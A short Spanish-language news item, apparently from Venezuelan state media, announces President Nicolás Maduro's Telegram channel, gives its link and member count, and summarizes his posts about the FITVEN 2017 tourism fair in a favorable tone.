El Presidente de la República, Nicolás Maduro Moros, cuenta con usuario en el canal Telegram.

Podrán encontrarlo en está plataforma al escribir Nicolás Maduro Moros, donde les aparecerá una fotografía del mandatario con la banda presidencial. Para sumarse solo deben pulsar en la palabra unirse. También pueden hacer clic aquí para seguirlo https://t.me/NicolasMaduroMoros

En la información de su canal Telegram se puede leer: “Presidente de la República de Venezuela. Hijo de Chávez. Construyendo la Patria con eficiencia revolucionaria”.

Hasta las 9:06 de la noche el canal del mandatario contaba con mil 870 miembros.

Entre las publicaciones más recientes del Presidente en su canal Telegram usted podrá leer parte de su intervención este domingo en la clausura de la XII Feria Internacional del Turismo (Fitven) que se desarrolló en la Isla de Margarita, Nueva Esparta.

“Con la Clausura de la FITVEN 2017 el Motor Turismo toma la energía necesaria para desarrollar este sector y convertir a Venezuela en una Potencia Turística, gracias a sus paisajes naturales, atractivos y sitios históricos, únicos en el mundo”, reseña el canal.

Además podrá encontrar gráficas acompañadas de frases del mandatario pronunciadas en la Fitven.

El Presidente Maduro es muy activo en las redes sociales, por ejemplo a través de su cuenta Twitter @NicolasMaduro realiza constantemente anuncios en materia económicos, políticos y sociales que benefician al pueblo.

Fuente: rnv.gob.ve

Telegram @Entreverao